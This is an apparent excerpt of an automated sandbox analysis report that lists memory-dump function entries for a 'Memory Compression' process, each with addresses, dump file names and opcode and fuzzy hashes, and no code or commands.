                                      • Opcode ID: 47cbf94359a2807c9437c608b43ca0ffa57a8b98d468ac35d45d64e5af831f9f
                                      • Instruction ID: 63c81686bb619d5bd8d9bd9b3c586767ba2fa200c0b15836857146419484ea9c
                                      • Opcode Fuzzy Hash: 47cbf94359a2807c9437c608b43ca0ffa57a8b98d468ac35d45d64e5af831f9f
                                      • Instruction Fuzzy Hash: 7D116DB0D1868E8FEB56EB6488692BD7BE0FF19341F1405BAD409C7192DE39A944C712
                                      Function 00007FF886EDCF80 Relevance: .1, Instructions: 58COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d2141900eb8b8b6664a4c6184349780dd917c2fd82cb9134a17774575eeeadd3
                                      • Instruction ID: b13800c16eae74955ebd5a421b83f0a6c3d9d72580a59f3b392b098d0341d584
                                      • Opcode Fuzzy Hash: d2141900eb8b8b6664a4c6184349780dd917c2fd82cb9134a17774575eeeadd3
                                      • Instruction Fuzzy Hash: 01116D3091969E8EEB46EB6888582F97BE0FF19380F2404BAD419CB193DE355950C741
                                      Function 00007FF886EE534D Relevance: .1, Instructions: 57COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 51ac02d9a3e7d407bb8edecaaabceca81e9f4670c9029850709944c5663bc905
                                      • Instruction ID: d3a7e0921eff941654752aff45893a782a8e585c622cc95a6c51c5de7a73fb11
                                      • Opcode Fuzzy Hash: 51ac02d9a3e7d407bb8edecaaabceca81e9f4670c9029850709944c5663bc905
                                      • Instruction Fuzzy Hash: 9911BFB0D0864E8FEB9AEB6484592BD7BE0FF18340F1405BAD409C7196DE79A840C711
                                      Function 00007FF886EE6639 Relevance: .1, Instructions: 57COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9254fd24f23655798321a4a90ffe21e6a81b9c711c58d3e9c5c4c303d0b84a28
                                      • Instruction ID: c5ecbe2b6d81e1d960187749b00d145eb1094f376f9a060be62a572f0e3b5308
                                      • Opcode Fuzzy Hash: 9254fd24f23655798321a4a90ffe21e6a81b9c711c58d3e9c5c4c303d0b84a28
                                      • Instruction Fuzzy Hash: 08119130D2C68A8FEB92EB78885D6B97BF0FF19340F1505B6D408C7192DE38A944C752
                                      Function 00007FF886EE1451 Relevance: .1, Instructions: 56COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee1000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b4eccbc431c172c2834cefac12feea39b984a90df09761d6f13a43a4d0a269cd
                                      • Instruction ID: e18293591f01626a7d6d31af936f6345091cc5a588abd35809b5f18412533ebc
                                      • Opcode Fuzzy Hash: b4eccbc431c172c2834cefac12feea39b984a90df09761d6f13a43a4d0a269cd
                                      • Instruction Fuzzy Hash: 9F117C70D1864E8FDB95EB6884592FD7BA0FF18344F1005BBD419C6291EA38A980C701
                                      Function 00007FF886ED0F58 Relevance: .1, Instructions: 55COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cff408780adf127df91c6193e8d58fec8d1f08a0408e4dc2aa6310f5afd935d0
                                      • Instruction ID: 0f5111de2185882daf6057e0cd81626c50f586b17addb9c336315d40102b8f8b
                                      • Opcode Fuzzy Hash: cff408780adf127df91c6193e8d58fec8d1f08a0408e4dc2aa6310f5afd935d0
                                      • Instruction Fuzzy Hash: 9B115131D18A0E8AFB54EF68C855BEDB7A2FF54350F344279C409AB196CE386C42CB84
                                      Function 00007FF886EE550D Relevance: .1, Instructions: 55COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 268cb3ee39c4ff38d90bbd9bf1392c2b4bad449db44293b7c006d5960cc37137
                                      • Instruction ID: e60a9487f11a3ac17851e2793b2576306752601e5e2143d114991a6ea37202ce
                                      • Opcode Fuzzy Hash: 268cb3ee39c4ff38d90bbd9bf1392c2b4bad449db44293b7c006d5960cc37137
                                      • Instruction Fuzzy Hash: 4311C170D18A8D8FEB49EB6488592B97BF2FF18340F1404BED40DC7192DF29A444C751
                                      Function 00007FF886ED34C5 Relevance: .1, Instructions: 52COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b8e7c9564f9abe2a71743c289b56538c0592dd3826c1d260258d889bbd8cd2fc
                                      • Instruction ID: f197f3e689f187c72d874639106f08e71f9c5249baa06088c11becd8d1ab1044
                                      • Opcode Fuzzy Hash: b8e7c9564f9abe2a71743c289b56538c0592dd3826c1d260258d889bbd8cd2fc
                                      • Instruction Fuzzy Hash: DB115E7091864E8FEB44EB68C8596BA7BE0FF19305F5005BED41AC3192DB39A540C701
                                      Function 00007FF886EE2931 Relevance: .1, Instructions: 51COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee1000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9d54c8356531dda431d39f06a442a5a41131a4801049589573d73be3bfd3c11c
                                      • Instruction ID: ef0cc8907b0158ae975d814a5fe43dde63b9cf9091447aee640731d47cb1307b
                                      • Opcode Fuzzy Hash: 9d54c8356531dda431d39f06a442a5a41131a4801049589573d73be3bfd3c11c
                                      • Instruction Fuzzy Hash: 5F01BC30D5868A8FDB59EF64846A2B97BA0FF18340F2514BED40AC7092DE3AA940C741
                                      Function 00007FF886ED05D8 Relevance: .0, Instructions: 50COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8e4ea50c7e6c4df1399d86e9abda16eb9f11eee09797f426451e8f08cb5c7ddb
                                      • Instruction ID: 5176c46ee86f2d019d7fc6e8d30061eb26997b6a67a5ce87ac2d3a1a3ad34aa1
                                      • Opcode Fuzzy Hash: 8e4ea50c7e6c4df1399d86e9abda16eb9f11eee09797f426451e8f08cb5c7ddb
                                      • Instruction Fuzzy Hash: 3F015E30A0890E8FEB99EF68C4556FA77A1FF58344F60457ED41EC7192CA36A950CB41
                                      Function 00007FF886ED2E31 Relevance: .0, Instructions: 50COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6156d6b40f403d2a11ab4f6c4538e79f4e7e51c05c7b10b4bc1c0eb9dd692a61
                                      • Instruction ID: ee6fc7df1a39b80524cdb3bea0b1f7d513f9b79bf74a86ef74759bfaba89f3cf
                                      • Opcode Fuzzy Hash: 6156d6b40f403d2a11ab4f6c4538e79f4e7e51c05c7b10b4bc1c0eb9dd692a61
                                      • Instruction Fuzzy Hash: D4018F3091864E9FE752EB78C4496A97BE0FF1A340F5149B6D818C70A2EB38E444C601
                                      Function 00007FF886EDB79A Relevance: .0, Instructions: 50COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8c5903b85ac84e1f427ed9f85ca4f919abde2a5c12dd4e7ca94dbabfce5a8229
                                      • Instruction ID: 3b801a85e645cc39bccc50d0d9e0efc82d077335f7b1deebe67e4b7f1f82f0b3
                                      • Opcode Fuzzy Hash: 8c5903b85ac84e1f427ed9f85ca4f919abde2a5c12dd4e7ca94dbabfce5a8229
                                      • Instruction Fuzzy Hash: 8F11BE74E1895E9FEB94EB18C4557AAB3F1FF58341F5082AAC40DD3156DB34AD81CB40
                                      Function 00007FF886EDB8E6 Relevance: .0, Instructions: 48COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 37c7c4bc351c53d248a931d9a4cfd20d3e198659e63ba18ee39c63328f1b1261
                                      • Instruction ID: 0be01d13d938b19f629ed5ee48b775dec068cc3644002754587a029a9380f508
                                      • Opcode Fuzzy Hash: 37c7c4bc351c53d248a931d9a4cfd20d3e198659e63ba18ee39c63328f1b1261
                                      • Instruction Fuzzy Hash: 7A119670D1851D9EEBA5EB18C8557EDB6B2FF58340F6041BAD40DA6292DE38AE85CF00
                                      Function 00007FF886EE82A9 Relevance: .0, Instructions: 47COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d062cd27e8194d0fc6d290e0bdd3d97bb48959854f6b8c3f4239c6fd3beb501e
                                      • Instruction ID: 9385d3df464d394acc12dfedcd9eb9577302f3769b96ec61be3e7e3e188ffc90
                                      • Opcode Fuzzy Hash: d062cd27e8194d0fc6d290e0bdd3d97bb48959854f6b8c3f4239c6fd3beb501e
                                      • Instruction Fuzzy Hash: 9B01F530D0D6898FDB4ADB6484692BE7BB0FF2A340F5504FEC44ACB092DE39A840C752
                                      Function 00007FF886EDC29B Relevance: .0, Instructions: 47COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4d3a5357c0ae6841256070d12a4e7722faff205036b5d743337042c2ee82ae7f
                                      • Instruction ID: 49ae81dfc0dab45bc542bfd8a63825ca00ee0e4df705451adb27efe5acdbf0ba
                                      • Opcode Fuzzy Hash: 4d3a5357c0ae6841256070d12a4e7722faff205036b5d743337042c2ee82ae7f
                                      • Instruction Fuzzy Hash: 9A015E3091891E8FEB84EFA8C4592BD77E5FF18384F20097AE81ED3192DE75A950C741
                                      Function 00007FF886ED2EA9 Relevance: .0, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4bac09f003946da5670d2bdc14cee15ad1f3e6d9279e53449faeed852259b4c9
                                      • Instruction ID: cb6c613c69de1a1fd4e950a743fad0072bf887ab0113596b6459cf5a79695f97
                                      • Opcode Fuzzy Hash: 4bac09f003946da5670d2bdc14cee15ad1f3e6d9279e53449faeed852259b4c9
                                      • Instruction Fuzzy Hash: EF017131D5D6894FE752AB78885A5A97BE0FF49340F1609F7D908CB0A3EA2CA884C701
                                      Function 00007FF886EE452F Relevance: .0, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d84222dee40d710bd836b6aa5494e4c3c9c393c14f60b9dee7bb114dceea3e18
                                      • Instruction ID: a054a15ff066af728e3fd6cc5bdfdc2ee285dedc033bcba976c7649f8c09c664
                                      • Opcode Fuzzy Hash: d84222dee40d710bd836b6aa5494e4c3c9c393c14f60b9dee7bb114dceea3e18
                                      • Instruction Fuzzy Hash: 23112A75D0811ACEDB14EF69D4447FCB7B1FF14341F6041BAE019A6282DB385A84DF65
                                      Function 00007FF886ED280D Relevance: .0, Instructions: 44COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6fd5b5af277883329eb2d28d2ac0dccdbccf7a19e244dbc70172607ea07f8040
                                      • Instruction ID: e17cd519c82e137246d77da288008320082d10a7c6f4a2746e85b8917aa0b010
                                      • Opcode Fuzzy Hash: 6fd5b5af277883329eb2d28d2ac0dccdbccf7a19e244dbc70172607ea07f8040
                                      • Instruction Fuzzy Hash: CD018B74D1864E8FEB91EB68848D7B97BE0FF59341F1545BAD808C60A2EA38E584C701
                                      Function 00007FF886EE7C59 Relevance: .0, Instructions: 43COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 89600e140819627dbf9f9ef3072b6d41e855479af1d3a544dcffc8976317bf58
                                      • Instruction ID: 84957ea82c1636413e7efddbcd0efca31d3b5aab1338b0c1bc31f9916c3b03a2
                                      • Opcode Fuzzy Hash: 89600e140819627dbf9f9ef3072b6d41e855479af1d3a544dcffc8976317bf58
                                      • Instruction Fuzzy Hash: 12018430E1D68A8FEB52AB7884991A97BE4FF49340F1509F2D508CB0A2DA28A844C712
                                      Function 00007FF886EE831D Relevance: .0, Instructions: 43COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5f3f46fab3c70bbb508f8835fe6f48e160c0ea0f280670cc5ccdf4d0fd465dae
                                      • Instruction ID: 127eb7fd8f26274b2e008ce58c64181bab20bc1ac3bbf0cefc3118cc3adf9237
                                      • Opcode Fuzzy Hash: 5f3f46fab3c70bbb508f8835fe6f48e160c0ea0f280670cc5ccdf4d0fd465dae
                                      • Instruction Fuzzy Hash: 3101D430D596498FDB88EB64C46D2BE7BA0FF49340F5404BED40ACA192DE39A950C711
                                      Function 00007FF886EDB089 Relevance: .0, Instructions: 43COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5f6824427eb6445b2cc83e6c7e7d5a380316475d761f082e1568c3768127ce77
                                      • Instruction ID: 8b43c301dc6a4a2be54fb2377534a597d30d0f24f5dc1dd013e5c7f92cd4178d
                                      • Opcode Fuzzy Hash: 5f6824427eb6445b2cc83e6c7e7d5a380316475d761f082e1568c3768127ce77
                                      • Instruction Fuzzy Hash: 7A01A27091D64A9FE742EB7888596A97BF1FF09380F5549F6D418C70A3FE38A944C702
                                      Function 00007FF886ED0610 Relevance: .0, Instructions: 42COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ebf77a157c3fd967808c5ec2d5da589520d56c2da0122e6399358fb0ed74d14f
                                      • Instruction ID: f9537640c1ba5231fe7ea78dd020ecf4bc2e522d31fa8ef322b43cf66f9b0f2d
                                      • Opcode Fuzzy Hash: ebf77a157c3fd967808c5ec2d5da589520d56c2da0122e6399358fb0ed74d14f
                                      • Instruction Fuzzy Hash: F501313091850EAFEB68EB68C4596B977E0FF18345F60087ED41EC61D2DE39A990C611
                                      Function 00007FF886ED0608 Relevance: .0, Instructions: 42COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 681ac945a8b7d5f5d612ee1aec1c76ced406da19b68eb68917d033ab7623fe85
                                      • Instruction ID: fee511ce182148a18523f624715144315859d11be7f51d6a3383cc8edf5ceb8d
                                      • Opcode Fuzzy Hash: 681ac945a8b7d5f5d612ee1aec1c76ced406da19b68eb68917d033ab7623fe85
                                      • Instruction Fuzzy Hash: 3901313095450EAEEBA8EB68C4592B977A0FF18345F60087ED41EC61D2DE39A550C641
                                      Function 00007FF886EDAF3B Relevance: .0, Instructions: 42COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6c6a4bfa21efba8d892a5645607d555e8db41be121aa6e95a694f86249a75d86
                                      • Instruction ID: 2364dff17c4115067b9defa4c7d946857a07b779422368d4dd7f2d5055fcd815
                                      • Opcode Fuzzy Hash: 6c6a4bfa21efba8d892a5645607d555e8db41be121aa6e95a694f86249a75d86
                                      • Instruction Fuzzy Hash: 7B016D7091850E9EEB58EF2CC4692B977A0FF18341F2008BED40EC6092DE75AA50C701
                                      Function 00007FF886ED1140 Relevance: .0, Instructions: 41COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2c4270f17b4f72fb9dbb129ad3ba8183a422f9a69f02bdd7a4ff9d5402ab49b2
                                      • Instruction ID: e37c3e3672d302c4953097e265c8819e0362ae79edc24a60c63d11b92c9b4eb6
                                      • Opcode Fuzzy Hash: 2c4270f17b4f72fb9dbb129ad3ba8183a422f9a69f02bdd7a4ff9d5402ab49b2
                                      • Instruction Fuzzy Hash: 76F0AF70D18A1E8AFB989BAC98583FA77E0FF66391F10067AD41AC61C2DE241958C641
                                      Function 00007FF886ED1C6D Relevance: .0, Instructions: 40COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f2680e9ceead2dd6da9956ebc38fbdcea20664178861da4a554842086d7e9697
                                      • Instruction ID: ac2eddc4b8ff406a66cb308c23fdc74372f9d81608dfca3c08be9bd9eb3c42f2
                                      • Opcode Fuzzy Hash: f2680e9ceead2dd6da9956ebc38fbdcea20664178861da4a554842086d7e9697
                                      • Instruction Fuzzy Hash: 7FF08C30909A4E8FEB99DF288859AFA77A0FF55345F60057AE819C6192CB39E850CB40
                                      Function 00007FF886EDB508 Relevance: .0, Instructions: 40COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7214c3f7d6f5d0f85af5dca6042705bda55a6047fc2d0494f3bd88aad50f7e0a
                                      • Instruction ID: ca48122b1390b52945c1789a1819928d9b5d92e7ca45aa80b3900dcdcee6dce0
                                      • Opcode Fuzzy Hash: 7214c3f7d6f5d0f85af5dca6042705bda55a6047fc2d0494f3bd88aad50f7e0a
                                      • Instruction Fuzzy Hash: 530144B0E1891E9EE741EB7CC44D6BA76E2FF58345F6048B5D41DC7196EE38B484CA01
                                      Function 00007FF886ED05D0 Relevance: .0, Instructions: 39COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ee1c9facee2ca88b6342a3bc7bc2027584646fd8ac8858cc634ca9f14832eb1b
                                      • Instruction ID: 5e57666e62cd18069597734d40642dcf2900f3be3e3a7b92e3163f2918a05a37
                                      • Opcode Fuzzy Hash: ee1c9facee2ca88b6342a3bc7bc2027584646fd8ac8858cc634ca9f14832eb1b
                                      • Instruction Fuzzy Hash: ABF0F03091960E8FEB99EF2894452FA37A0FF15344F60053AE80DC7182CB39E8A0CB81
                                      Function 00007FF886EE7D8A Relevance: .0, Instructions: 38COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7566a65ce41940427387955aac0e7f139b0b57692203b0081528a46e4fe278d0
                                      • Instruction ID: 9bbe1458e246601564384d4c373760fb14b0c89b9f9084aabf967dca4402890d
                                      • Opcode Fuzzy Hash: 7566a65ce41940427387955aac0e7f139b0b57692203b0081528a46e4fe278d0
                                      • Instruction Fuzzy Hash: D901EE74D0861A8FEF64EF94D4946ECBAB1FB18361F24016ED009E2291DB386988CB25
                                      Function 00007FF886ED2729 Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c9ea8180432437446478f9baa514fd6347778686a6304b6c3dd51d474ca2729f
                                      • Instruction ID: 7546c906aad585d8a0dd0a21b8e2f18813a0a0b07e88956874a77f18f9b87990
                                      • Opcode Fuzzy Hash: c9ea8180432437446478f9baa514fd6347778686a6304b6c3dd51d474ca2729f
                                      • Instruction Fuzzy Hash: ABF0C83180D3899FDB659F2484252A93B60FF05340F5504BED449C60D3DA3C9854C741
                                      Function 00007FF886EE1470 Relevance: .0, Instructions: 32COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee1000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0447b79281b8074d6891f04e342cdbdd5c91919d66f0023f7fd0fc0590156aa2
                                      • Instruction ID: 7b5797627245b8f1c101049567410d2467ae9a3eda0377c8cae0442e7d02e34e
                                      • Opcode Fuzzy Hash: 0447b79281b8074d6891f04e342cdbdd5c91919d66f0023f7fd0fc0590156aa2
                                      • Instruction Fuzzy Hash: 6CF0FE70D1455E8EEB94EF6898182FE77A4FF18305F50053BE81DC2291EB345594C651
                                      Function 00007FF886ED279D Relevance: .0, Instructions: 31COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5c9a1f98ac24e19ba2e3ae15f3eeaba662ed23d5093254c6ab9e1cd6f403daeb
                                      • Instruction ID: 40327963e551d2ddae569dbefb565386d5602c8fadc95ba7007732e15d1d72e1
                                      • Opcode Fuzzy Hash: 5c9a1f98ac24e19ba2e3ae15f3eeaba662ed23d5093254c6ab9e1cd6f403daeb
                                      • Instruction Fuzzy Hash: 0BF0243081E78A8FEB689F28842A2B93BA0FF05314F0404BEE509C60D3DB3D9850C301
                                      Function 00007FF886EE1D23 Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE1000, based on PE: false
